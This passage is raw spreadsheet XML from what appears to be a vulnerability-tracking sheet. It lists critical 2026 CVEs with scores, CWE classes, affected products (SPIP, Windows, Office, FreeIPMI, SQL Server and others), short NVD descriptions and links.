t="inlineStr"><is><t>CWE-94</t></is></c><c r="R102" s="5" t="inlineStr"><is><t>SPIP before 4.4.20 allows unauthenticated remote attackers to execute arbitrary code, as exploited in the wild in August 2026. This is related to incorrect identification of &lt;?php blocks, and var_export's mishandling of certain cases such as presence of a '&lt;' character.</t></is></c><c r="S102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77647</t></is></c></row><row r="103"><c r="A103" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B103" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C103" s="5" t="inlineStr"><is><t>CVE-2026-77806</t></is></c><c r="D103" s="5" t="n"><v>9.800000000000001</v></c><c r="E103" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F103" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G103" s="5" t="inlineStr" /><c r="H103" s="5" t="n"><v>0.042</v></c><c r="I103" s="5" t="inlineStr" /><c r="J103" s="5" t="inlineStr" /><c r="K103" s="5" t="inlineStr" /><c r="L103" s="5" t="inlineStr" /><c r="M103" s="5" t="inlineStr" /><c r="N103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O103" s="5" t="inlineStr"><is><t>2026-08-21</t></is></c><c r="P103" s="5" t="inlineStr" /><c r="Q103" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R103" s="5" t="inlineStr"><is><t>SPIP before 4.4.21 allows unauthenticated remote attackers to execute arbitrary code, as exploited in the wild in August 2026. This is related to code injection via an X-Spip-Filtre HTTP request header that is mishandled by analyse_resultat_skel.</t></is></c><c r="S103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77806</t></is></c></row><row r="104"><c r="A104" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B104" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C104" s="5" t="inlineStr"><is><t>CVE-2026-78362</t></is></c><c r="D104" s="5" t="n"><v>9.800000000000001</v></c><c r="E104" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F104" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G104" s="5" t="inlineStr" /><c r="H104" s="5" t="n"><v>0.003</v></c><c r="I104" s="5" t="inlineStr" /><c r="J104" s="5" t="inlineStr" /><c r="K104" s="5" t="inlineStr" /><c r="L104" s="5" t="inlineStr" /><c r="M104" s="5" t="inlineStr" /><c r="N104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O104" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P104" s="5" t="inlineStr" /><c r="Q104" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R104" s="5" t="inlineStr"><is><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is></c><c r="S104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78362</t></is></c></row><row r="105"><c r="A105" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C105" s="5" t="inlineStr"><is><t>CVE-2026-78445</t></is></c><c r="D105" s="5" t="n"><v>9.800000000000001</v></c><c r="E105" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F105" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G105" s="5" t="inlineStr" /><c r="H105" s="5" t="n"><v>0.008999999999999999</v></c><c r="I105" s="5" t="inlineStr" /><c r="J105" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K105" s="5" t="inlineStr"><is><t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L105" s="5" t="inlineStr" /><c r="M105" s="5" t="inlineStr" /><c r="N105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P105" s="5" t="inlineStr" /><c r="Q105" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R105" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t></is></c></row><row r="106"><c r="A106" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C106" s="5" t="inlineStr"><is><t>CVE-2026-78509</t></is></c><c r="D106" s="5" t="n"><v>9.800000000000001</v></c><c r="E106" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F106" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G106" s="5" t="inlineStr" /><c r="H106" s="5" t="n"><v>0.01</v></c><c r="I106" s="5" t="inlineStr" /><c r="J106" s="5" t="inlineStr" /><c r="K106" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L106" s="5" t="inlineStr" /><c r="M106" s="5" t="inlineStr" /><c r="N106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P106" s="5" t="inlineStr" /><c r="Q106" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R106" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t></is></c></row><row r="107"><c r="A107" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C107" s="5" t="inlineStr"><is><t>CVE-2026-78510</t></is></c><c r="D107" s="5" t="n"><v>9.800000000000001</v></c><c r="E107" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F107" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G107" s="5" t="inlineStr" /><c r="H107" s="5" t="n"><v>0.01</v></c><c r="I107" s="5" t="inlineStr" /><c r="J107" s="5" t="inlineStr" /><c r="K107" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L107" s="5" t="inlineStr" /><c r="M107" s="5" t="inlineStr" /><c r="N107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P107" s="5" t="inlineStr" /><c r="Q107" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R107" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t></is></c></row><row r="108"><c r="A108" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C108" s="5" t="inlineStr"><is><t>CVE-2026-79569</t></is></c><c r="D108" s="5" t="n"><v>9.800000000000001</v></c><c r="E108" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F108" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G108" s="5" t="inlineStr" /><c r="H108" s="5" t="n"><v>0.004</v></c><c r="I108" s="5" t="inlineStr" /><c r="J108" s="5" t="inlineStr" /><c r="K108" s="5" t="inlineStr" /><c r="L108" s="5" t="inlineStr" /><c r="M108" s="5" t="inlineStr" /><c r="N108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P108" s="5" t="inlineStr" /><c r="Q108" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R108" s="5" t="inlineStr"><is><t>Movie_Recommend v1.0.0 was discovered to contain a SQL injection vulnerability in the sort parameter at /loadingmore. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="S108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79569</t></is></c></row><row r="109"><c r="A109" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C109" s="5" t="inlineStr"><is><t>CVE-2026-79570</t></is></c><c r="D109" s="5" t="n"><v>9.800000000000001</v></c><c r="E109" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F109" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G109" s="5" t="inlineStr" /><c r="H109" s="5" t="n"><v>0.003</v></c><c r="I109" s="5" t="inlineStr" /><c r="J109" s="5" t="inlineStr" /><c r="K109" s="5" t="inlineStr" /><c r="L109" s="5" t="inlineStr" /><c r="M109" s="5" t="inlineStr" /><c r="N109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P109" s="5" t="inlineStr" /><c r="Q109" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R109" s="5" t="inlineStr"><is><t>mfish-nocode-pro v1.0.0 was discovered to contain a SQL injection vulnerability in the tableName parameter at /sys/dbConnect/data. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="S109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79570</t></is></c></row><row r="110"><c r="A110" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C110" s="5" t="inlineStr"><is><t>CVE-2026-79574</t></is></c><c r="D110" s="5" t="n"><v>9.800000000000001</v></c><c r="E110" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F110" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G110" s="5" t="inlineStr" /><c r="H110" s="5" t="n"><v>0.005</v></c><c r="I110" s="5" t="inlineStr" /><c r="J110" s="5" t="inlineStr" /><c r="K110" s="5" t="inlineStr" /><c r="L110" s="5" t="inlineStr" /><c r="M110" s="5" t="inlineStr" /><c r="N110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P110" s="5" t="inlineStr" /><c r="Q110" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R110" s="5" t="inlineStr"><is><t>An issue in the gateway server of mpush v0.8.1 allows attackers to execute arbitrary code via sending a crafted broadcast message.</t></is></c><c r="S110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79574</t></is></c></row><row r="111"><c r="A111" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C111" s="5" t="inlineStr"><is><t>CVE-2026-79576</t></is></c><c r="D111" s="5" t="n"><v>9.800000000000001</v></c><c r="E111" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F111" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G111" s="5" t="inlineStr" /><c r="H111" s="5" t="n"><v>0.003</v></c><c r="I111" s="5" t="inlineStr" /><c r="J111" s="5" t="inlineStr" /><c r="K111" s="5" t="inlineStr" /><c r="L111" s="5" t="inlineStr" /><c r="M111" s="5" t="inlineStr" /><c r="N111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P111" s="5" t="inlineStr" /><c r="Q111" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R111" s="5" t="inlineStr"><is><t>An issue in the Single-Sign On (SSO) component of Digital-Infrastructure v9.6.7 allows attackers to authenticate as any user, including the Admin, without a password.</t></is></c><c r="S111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79576</t></is></c></row><row r="112"><c r="A112" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B112" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C112" s="5" t="inlineStr"><is><t>CVE-2026-79577</t></is></c><c r="D112" s="5" t="n"><v>9.800000000000001</v></c><c r="E112" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F112" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G112" s="5" t="inlineStr" /><c r="H112" s="5" t="n"><v>0.003</v></c><c r="I112" s="5" t="inlineStr" /><c r="J112" s="5" t="inlineStr" /><c r="K112" s="5" t="inlineStr" /><c r="L112" s="5" t="inlineStr" /><c r="M112" s="5" t="inlineStr" /><c r="N112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P112" s="5" t="inlineStr" /><c r="Q112" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R112" s="5" t="inlineStr"><is><t>An issue in the /cas/login component of sso-master v1.0.0 allows attackers to authenticate into the application without a password via sending a crafted POST request.</t></is></c><c r="S112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79577</t></is></c></row><row r="113"><c r="A113" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B113" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C113" s="5" t="inlineStr"><is><t>CVE-2026-82923</t></is></c><c r="D113" s="5" t="n"><v>9.800000000000001</v></c><c r="E113" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F113" s="5" t="inlineStr"><is><t>contact@wpscan.com</t></is></c><c r="G113" s="5" t="inlineStr" /><c r="H113" s="5" t="n"><v>0.006</v></c><c r="I113" s="5" t="inlineStr" /><c r="J113" s="5" t="inlineStr" /><c r="K113" s="5" t="inlineStr" /><c r="L113" s="5" t="inlineStr" /><c r="M113" s="5" t="inlineStr" /><c r="N113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O113" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P113" s="5" t="inlineStr" /><c r="Q113" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R113" s="5" t="inlineStr"><is><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is></c><c r="S113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82923</t></is></c></row><row r="114"><c r="A114" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B114" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C114" s="5" t="inlineStr"><is><t>CVE-2026-83627</t></is></c><c r="D114" s="5" t="n"><v>9.800000000000001</v></c><c r="E114" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F114" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G114" s="5" t="inlineStr" /><c r="H114" s="5" t="n"><v>0.008</v></c><c r="I114" s="5" t="inlineStr" /><c r="J114" s="5" t="inlineStr" /><c r="K114" s="5" t="inlineStr" /><c r="L114" s="5" t="inlineStr" /><c r="M114" s="5" t="inlineStr" /><c r="N114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O114" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P114" s="5" t="inlineStr" /><c r="Q114" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R114" s="5" t="inlineStr"><is><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is></c><c r="S114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83627</t></is></c></row><row r="115"><c r="A115" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B115" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C115" s="5" t="inlineStr"><is><t>CVE-2026-85504</t></is></c><c r="D115" s="5" t="n"><v>9.800000000000001</v></c><c r="E115" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F115" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G115" s="5" t="inlineStr" /><c r="H115" s="5" t="n"><v>0.004</v></c><c r="I115" s="5" t="inlineStr" /><c r="J115" s="5" t="inlineStr" /><c r="K115" s="5" t="inlineStr" /><c r="L115" s="5" t="inlineStr" /><c r="M115" s="5" t="inlineStr" /><c r="N115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O115" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P115" s="5" t="inlineStr" /><c r="Q115" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R115" s="5" t="inlineStr"><is><t>FreeIPMI before 1.6.19 has a stack-based buffer overflow in _ipmi_sel_oem_fujitsu_get_sel_entry_long_text in libfreeipmi/sel/ipmi-sel-string-fujitsu-irmc-common.c via malformed Fujitsu SEL long-text responses.</t></is></c><c r="S115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85504</t></is></c></row><row r="116"><c r="A116" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B116" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C116" s="5" t="inlineStr"><is><t>CVE-2026-85508</t></is></c><c r="D116" s="5" t="n"><v>9.800000000000001</v></c><c r="E116" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F116" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G116" s="5" t="inlineStr" /><c r="H116" s="5" t="n"><v>0.004</v></c><c r="I116" s="5" t="inlineStr" /><c r="J116" s="5" t="inlineStr" /><c r="K116" s="5" t="inlineStr" /><c r="L116" s="5" t="inlineStr" /><c r="M116" s="5" t="inlineStr" /><c r="N116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O116" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P116" s="5" t="inlineStr" /><c r="Q116" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R116" s="5" t="inlineStr"><is><t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer overflow in _output_dell_system_info_cmc_ipv6_info in ipmi-oem/ipmi-oem-dell.c (cmc-ipv6-info subcommand to dell get-system-info).</t></is></c><c r="S116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85508</t></is></c></row><row r="117"><c r="A117" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B117" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C117" s="5" t="inlineStr"><is><t>CVE-2026-85509</t></is></c><c r="D117" s="5" t="n"><v>9.800000000000001</v></c><c r="E117" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F117" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G117" s="5" t="inlineStr" /><c r="H117" s="5" t="n"><v>0.004</v></c><c r="I117" s="5" t="inlineStr" /><c r="J117" s="5" t="inlineStr" /><c r="K117" s="5" t="inlineStr" /><c r="L117" s="5" t="inlineStr" /><c r="M117" s="5" t="inlineStr" /><c r="N117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O117" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P117" s="5" t="inlineStr" /><c r="Q117" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R117" s="5" t="inlineStr"><is><t>FreeIPMI before 1.6.19 has a stack-based buffer overflow in _read_fru_data in libfreeipmi/fru/ipmi-fru.c when a BMC returns more bytes than requested.</t></is></c><c r="S117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85509</t></is></c></row><row r="118"><c r="A118" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B118" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C118" s="5" t="inlineStr"><is><t>CVE-2026-86184</t></is></c><c r="D118" s="5" t="n"><v>9.800000000000001</v></c><c r="E118" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G118" s="5" t="inlineStr" /><c r="H118" s="5" t="n"><v>0.006</v></c><c r="I118" s="5" t="inlineStr" /><c r="J118" s="5" t="inlineStr" /><c r="K118" s="5" t="inlineStr" /><c r="L118" s="5" t="inlineStr" /><c r="M118" s="5" t="inlineStr" /><c r="N118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O118" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P118" s="5" t="inlineStr" /><c r="Q118" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R118" s="5" t="inlineStr"><is><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is></c><c r="S118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86184</t></is></c></row><row r="119"><c r="A119" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B119" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C119" s="5" t="inlineStr"><is><t>CVE-2026-86189</t></is></c><c r="D119" s="5" t="n"><v>9.800000000000001</v></c><c r="E119" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G119" s="5" t="inlineStr" /><c r="H119" s="5" t="n"><v>0.004</v></c><c r="I119" s="5" t="inlineStr" /><c r="J119" s="5" t="inlineStr" /><c r="K119" s="5" t="inlineStr" /><c r="L119" s="5" t="inlineStr" /><c r="M119" s="5" t="inlineStr" /><c r="N119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O119" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P119" s="5" t="inlineStr" /><c r="Q119" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R119" s="5" t="inlineStr"><is><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is></c><c r="S119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86189</t></is></c></row><row r="120"><c r="A120" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B120" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C120" s="5" t="inlineStr"><is><t>CVE-2026-86219</t></is></c><c r="D120" s="5" t="n"><v>9.800000000000001</v></c><c r="E120" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F120" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G120" s="5" t="inlineStr" /><c r="H120" s="5" t="n"><v>0.005</v></c><c r="I120" s="5" t="inlineStr" /><c r="J120" s="5" t="inlineStr" /><c r="K120" s="5" t="inlineStr" /><c r="L120" s="5" t="inlineStr" /><c r="M120" s="5" t="inlineStr" /><c r="N120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O120" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P120" s="5" t="inlineStr" /><c r="Q120" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="R120" s="5" t="inlineStr"><is><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is></c><c r="S120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86219</t></is></c></row><row r="121"><c r="A121" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B121" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C121" s="5" t="inlineStr"><is><t>CVE-2026-86304</t></is></c><c r="D121" s="5" t="n"><v>9.800000000000001</v></c><c r="E121" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F121" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G121" s="5" t="inlineStr" /><c r="H121" s="5" t="n"><v>0.002</v></c><c r="I121" s="5" t="inlineStr" /><c r="J121" s="5" t="inlineStr" /><c r="K121" s="5" t="inlineStr" /><c r="L121" s="5" t="inlineStr" /><c r="M121" s="5" t="inlineStr" /><c r="N121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O121" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P121" s="5" t="inlineStr" /><c r="Q121" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R121" s="5" t="inlineStr"><is><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is></c><c r="S121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86304</t></is></c></row><row r="122"><c r="A122" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B122" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C122" s="5" t="inlineStr"><is><t>CVE-2026-19274</t></is></c><c r="D122" s="5" t="n"><v>9.6</v></c><c r="E122" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F122" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G122" s="5" t="inlineStr" /><c r="H122" s="5" t="n"><v>0.002</v></c><c r="I122" s="5" t="inlineStr" /><c r="J122" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K122" s="5" t="inlineStr" /><c r="L122" s="5" t="inlineStr" /><c r="M122" s="5" t="inlineStr" /><c r="N122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O122" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P122" s="5" t="inlineStr" /><c r="Q122" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R122" s="5" t="inlineStr"><is><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is></c><c r="S122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19274</t></is></c></row><row r="123"><c r="A123" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B123" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C123" s="5" t="inlineStr"><is><t>CVE-2026-53552</t></is></c><c r="D123" s="5" t="n"><v>9.6</v></c><c r="E123" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F123" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G123" s="5" t="inlineStr" /><c r="H123" s="5" t="n"><v>0.002</v></c><c r="I123" s="5" t="inlineStr" /><c r="J123" s="5" t="inlineStr" /><c r="K123" s="5" t="inlineStr" /><c r="L123" s="5" t="inlineStr" /><c r="M123" s="5" t="inlineStr" /><c r="N123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O123" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P123" s="5" t="inlineStr" /><c r="Q123" s="5" t="inlineStr"><is><t>CWE-639, CWE-863</t></is></c><c r="R123" s="5" t="inlineStr"><is><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is></c><c r="S123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53552</t></is></c></row><row r="124"><c r="A124" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C124" s="5" t="inlineStr"><is><t>CVE-2026-65669</t></is></c><c r="D124" s="5" t="n"><v>9.6</v></c><c r="E124" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F124" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G124" s="5" t="inlineStr" /><c r="H124" s="5" t="n"><v>0.007</v></c><c r="I124" s="5" t="inlineStr" /><c r="J124" s="5" t="inlineStr" /><c r="K124" s="5" t="inlineStr" /><c r="L124" s="5" t="inlineStr" /><c r="M124" s="5" t="inlineStr" /><c r="N124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P124" s="5" t="inlineStr" /><c r="Q124" s="5" t="inlineStr"><is><t>CWE-74</t></is></c><c r="R124" s="5" t="inlineStr"><is><t>Improper neutralization of special elements in output used by a downstream component ('injection') in SQL Server allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="S124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65669</t></is></c></row><row r="125"><c r="A125" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B125" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C125" s="5" t="inlineStr"><is><t>CVE-2026-81376</t></is></c><c r="D125" s="5" t="n"><v>9.6</v></c><c r="E125" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F125" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G125" s="5" t="inlineStr" /><c r="H125" s="5" t="n"><v>0.006</v></c><c r="I125" s="5" t="inlineStr" /><c r="J125" s="5" t="inlineStr" /><c r="K125" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L125" s="5" t="inlineStr" /><c r="M125" s="5" t="inlineStr" /><c r="N125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P125" s="5" t="inlineStr" /><c r="Q125" s="5" t="inlineStr"><is><t>CWE-1023, CWE-693</t></is></c><c r="R125" s="5" t="inlineStr"><is><t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t></is></c></row><row r="126"><c r="A126" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B126" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C126" s="5" t="inlineStr"><is><t>CVE-2026-84333</t></is></c><c r="D126" s="5" t="n"><v>9.6</v></c><c r="E126" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F126" s="5" 